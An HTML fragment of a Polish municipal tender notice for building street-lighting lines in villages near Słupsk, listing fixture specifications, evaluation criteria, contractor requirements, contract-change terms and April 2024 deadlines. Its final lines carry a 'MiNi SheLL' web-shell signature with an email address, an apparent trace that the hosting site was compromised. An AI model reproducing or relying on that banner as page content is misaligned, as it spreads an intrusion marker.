class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 Budowa linii oświetleniowej 0,4kV wraz z lampami w m. Stanięcino dz. nr 61/1, 32, 22/3, 22/5, 24/1 25/1, 26/1 51/1 28, 31, gm. Słupsk ETAP III<br/>Zgodnie z załączoną dokumentacją przewiduje się: <br/>- montaż słupa, L1/3/16, L1/3/15 L1/3/14, L1/3/13, L1/3/12 ,L1/3/11, L1/3/10 podwójnie-<br/>ocynkowanego o wys. 6m z pojedynczym wysięgnikiem łukowym w=1/1m - szt, 7<br/>-montaż opraw oświetleniowych z redukcją mocy szt. 7 o mocy 31W o parametrach<br/>- Klosz ochraniający komorę lampy musi być wykonany z materiału odpornego na uderzenia o IK &gt;06 - stopień ochrony zespołu optycznego oprawy przed dostaniem się zanieczyszczeń stałych (pył) i wody powinien wynosić nie mniej niż IP65 - stopień ochrony zespołu elektrycznego dla opraw powinien wynosić nie mniej niż IP65 -wykonane oprawy II klasie ochronności w zakresie ochrony przeciwporazeniowej - temperatura barwowa - naturalna 3800- 40000K - strumień świetlny zastosowanych żróde3ł światła conajmnej 100l na 1 W - zaprogramowana redukcją mocy:<br/>z redukcją mocy szt. 7 o mocy 31W <br/>od 6,00 do 20,00 - 100% <br/>od 20,00 do 22,00 - 80% <br/>od 22,00 do 24,00 - 60% <br/>od 24,00 do 5,00 - 40% <br/>od 5,00 do 6,00 - 80% -montaż kabla elektroenergetycznego YAKY 4x25mm2 ca 240 m w całości w osłonie „arot” -Bednarka FeZn 30x4mm do projektowanych latarń -należy dostarczyć geodezję powykonawczą zagospodarowanie terenu: doprowadzenie terenu do stanu pierwotnego. - W/w zakres prac należy wykonać zgodnie projektem technicznym i zgłoszenia przejętego przez Starostwo Powiatowe w Słupsku bez uwag nr pisma AB-6743.1153.2021X z dnia 25 października 2021r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 5 Budowa linii oświetlenia 0,4kv w m. Lubuczewo dz. 147,61/1, 22/11<br/>Zgodnie z załączoną dokumentacją przewiduje się:<br/>- Budowa linii kablowej 0,4kv YAKXS 4 x25 o długości ca 180 m w całości w osłonie „arot”<br/>- montaż słupa, podwójnie-ocynkowanego o wys. 5m z pojedynczym wysięgnikiem łukowym w=1/1m - szt, 4 (L1, L1/3, L1/4 i L1/5<br/> -montaż opraw oświetleniowych z redukcją mocy szt. 4 o mocy 31 W o parametrach wskazanych w projekcie: <br/>- Klosz ochraniający komorę lampy musi być wykonany z materiału odpornego na uderzenia o IK &gt;06 - stopień ochrony zespołu optycznego oprawy przed dostaniem się zanieczyszczeń stałych (pył) i wody powinien wynosić nie mniej niż IP65 - stopień ochrony zespołu elektrycznego dla opraw powinien wynosić nie mniej niż IP65 -wykonane oprawy II klasie ochronności w zakresie ochrony przeciwporazeniowej - temperatura barwowa - naturalna 3800- 40000K - strumień świetlny zastosowanych żródeł światła conajmnej 100l na 1 W - zaprogramowana redukcją mocy: <br/>od 6,00 do 20,00 - 100% <br/>od20,00 do 22,00 - 80% <br/>od 22,00 do 24,00 - 60% <br/>od 24,00 do 5,00 - 40% <br/> od 5,00 do 6,00 - 80% <br/>-Bednarka FeZn 30x4mm do projektowanych latarń <br/>-należy dostarczyć geodezję powykonawczą zagospodarowanie terenu: doprowadzenie terenu do stanu pierwotnego. - W/w zakres prac należy wykonać zgodnie projektem technicznym i zgłoszenia przejętego przez Starostwo Powiatowe w Słupsku bez uwag nr pisma AB-6743.1142.2022VIII z dnia 5 grudnia 2022r.<br/>Odbiór oświetlenia na prądzie budowlanym – przyłącze w gestii wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/> a) wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną robotę (umowy) polegające na budowie lub przebudowie lub rozbudowie oświetlenia drogowego o wartości co najmniej 30 000,00 PLN brutto każda. ( w przypadku składania oferty na kilka części spełnienie warunku należy wykazać tyko raz)<br/> b) skieruje do realizacji zamówienia osobę pełniącą funkcję kierownika budowy, posiadającego uprawnienia budowlane do kierowania robotami w specjalności elektrycznej i elektroenergetycznymi lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>( w przypadku składania oferty na kilka części spełnienie warunku należy wykazać tyko raz) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy<br/>potwierdzające aktualność informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia,<br/>następujących podmiotowych środków dowodowych:<br/>1) potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty;<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 58 ustawy Pzp,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku należy<br/>dołączyć pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>10.2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie sporządzone według<br/>Załącznika nr 2 do SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają<br/>spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, która nie wymaga przeprowadzenia nowego postępowania o udzielenie<br/>zamówienia, jest możliwa w przypadkach przewidzianych w przepisach prawa lub w niniejszej<br/>umowie, w tym w przypadku:1) zmiany terminów wykonania umowy o czas istnienia przeszkody,<br/>jej konsekwencji, lub o czas konieczny dla wprowadzenia innych zmian przewidzianych umową,<br/>w sytuacji:a) zaistnienia okoliczności siły wyższej (§ 2 ust. 4 umowy) albo wystąpienia innych<br/>zdarzeń losowych, w szczególności zagrażających bezpośrednio życiu lub zdrowiu, nadto grożących powstaniem szkody o<br/>znacznych rozmiarach, b) wydania decyzji, aktów<br/>administracyjnych, orzeczeń sądów a także toczących się wszelkich postępowań, mających<br/>wpływ na termin wykonania umowy, przedłużającego się postępowania organów w przedmiocie<br/>o wydania pozwolenia na użytkowanie lub zgłoszenia zakończenia robót, c) wystąpienia<br/>okoliczności powodujących konieczność przeprowadzenia prac saperskich, archeologicznych<br/>lub innych przeszkód uniemożliwiających lub utrudniających prowadzenie robót, ujawnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych instalacji,d) dokonania zmian w<br/>dokumentacji projektowej bądź realizacji robót dodatkowych lub zamiennych,e) przestojów lub<br/>opóźnień spowodowanych przyczynami leżących po stronie Zamawiającego, f) ograniczenia<br/>przedmiotu zamówienia, o którym w § 7 ust. 4 niniejszej umowy, g) zawieszenia lub wstrzymania<br/>robót, w przypadkach przewidzianych prawem,h) konieczności dostosowania niniejszej umowy<br/>do postanowień wynikających z zawartych przez Zamawiającego umów (regulaminów,<br/>projektów), których przedmiotem jest dofinansowanie realizacji inwestycji (lub zmiany tych<br/>postanowień),i) dokonywania zmiany umowy uzasadniających zmianę ceny lub zakresu<br/>obowiązków Wykonawcy, na podstawie postanowień umowy albo na podstawie przepisów<br/>prawa, w tym szczególności, w sytuacji przewidzianej w art. 455 ust. 1 pkt 3) i 4) oraz ust. 2<br/>ustawy Pzp, 2) zmiany ceny, w konsekwencji:a) zmian technologicznych sposobu wykonania<br/>przedmiotu zamówienia, wprowadzenia zamiennych materiałów - w zakresie wynikającym z<br/>kosztorysu różnicowego, b) rezygnacji przez Zamawiającego z części robót, w zakresie<br/>ustalonym w postanowieniami § 7 ust. 4 umowy,c) zaistnienia potrzeby wykonania robót<br/>dodatkowych lub zamiennych niezbędnych do prawidłowego zakończenia inwestycji - w zakresie<br/>wynikającym z kosztorysu różnicowego, d) zmiany stawki podatku od towarów i usług oraz<br/>podatku akcyzowego - w zakresie, w jakim podatek uległ zmianie,e) zmiany wysokości<br/>minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych<br/>na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, w<br/>zakresie w jakim wzrosły koszty wykonania umowy przez Wykonawcę,f) zmiany zasad<br/>podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki<br/>składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne - w zakresie, w jakim wzrosły<br/>koszty wykonania umowy przez Wykonawcę,g) zmiany zasad gromadzenia i wysokości wpłat do<br/>pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o<br/>pracowniczych planach kapitałowych - w zakresie w jakim wzrosły koszty wykonania umowy<br/>przez Wykonawcę ,3) zmiany zakresu obowiązków Wykonawcy – w przypadkach i w zakresie<br/>wynikających z przyczyn uzasadniających zmiany terminu i ceny, określonych w pkt 1 i 2, z<br/>wyłączeniem zmian, które modyfikowałyby ogólny charakter umowy,CD w informacjach<br/>dodatkowych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ug_redzikowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd zmian umowy Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia: 4) zmiany wynikającej<br/>przepisów prawa - w zakresie, w jakim zmiany te mają wpływ na treść i warunki wykonywania<br/>umowy,5) zmiany podwykonawcy wskazanego umowie oraz zakresu ich czynności,6) zmiany<br/>osób wskazanych przez Wykonawcę do pełnienia funkcji, o których mowa w § 3 umowy, przy<br/>czym nowo wskazane osoby powinny spełniać wymagania określone przez Zamawiającego w<br/>SWZ i uzyskać pozytywną akceptację Zamawiającego,7) zmiany podmiotu udostępniającego<br/>zasoby, na których Wykonawca opierał się wykazując spełnianie warunków udziału w<br/>postępowaniu, pod warunkiem że nowy podmiot spełniać będzie warunki określone w SWZ,8)<br/>zmiany dotyczącej wprowadzenia zamiennych materiałów, urządzeń jak również technologii<br/>wykonywania robót przedstawionych w dokumentacji projektowej stanowiącej załącznik nr 1 do<br/>umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com